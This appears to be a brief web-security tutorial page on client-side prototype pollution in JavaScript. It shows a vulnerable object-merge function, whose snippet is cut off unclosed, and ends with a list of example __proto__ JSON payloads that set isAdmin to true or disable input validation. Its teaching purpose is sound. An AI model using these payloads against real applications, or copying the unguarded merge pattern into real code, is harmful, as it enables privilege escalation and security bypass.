Client-side prototype pollution

What is it?

Client-side Prototype Pollution is an attack that occurs when an attacker is able to manipulate the prototype of a JavaScript object. This can lead to unexpected behavior in the application, and sometimes lead to bypassing of security measures and Remote Code Execution.

A simple example

Consider this vulnerable JavaScript function:

function extend(target, source) {
  for (let key in source) {
    target[key] = source[key];

If an we can control the source object and sets source.__proto__.isAdmin = true, then this will set isAdmin = true on all objects that inherit from Object, potentially leading to an escalation of privileges.

Note that payload or attack depends on the application and the structure of the code. Client-side Prototype Pollution can often lead to:

  • Privilege escalation

  • Security measures bypass

  • Data manipulation

  • Remote code execution

Other learning resources:




// Add new property
payload = '{"__proto__":{"polluted":"pwned"}}'

// Modify an existing property
payload = '{"__proto__":{"existingProperty":"new value"}}'

// Delete a property
payload = '{"__proto__":{"existingProperty":null}}'

// Adding user privilege
payload = '{"__proto__":{"isAdmin":true}}'

// Bypassing security measures
payload = '{"__proto__":{"validateInput":false}}'

Last updated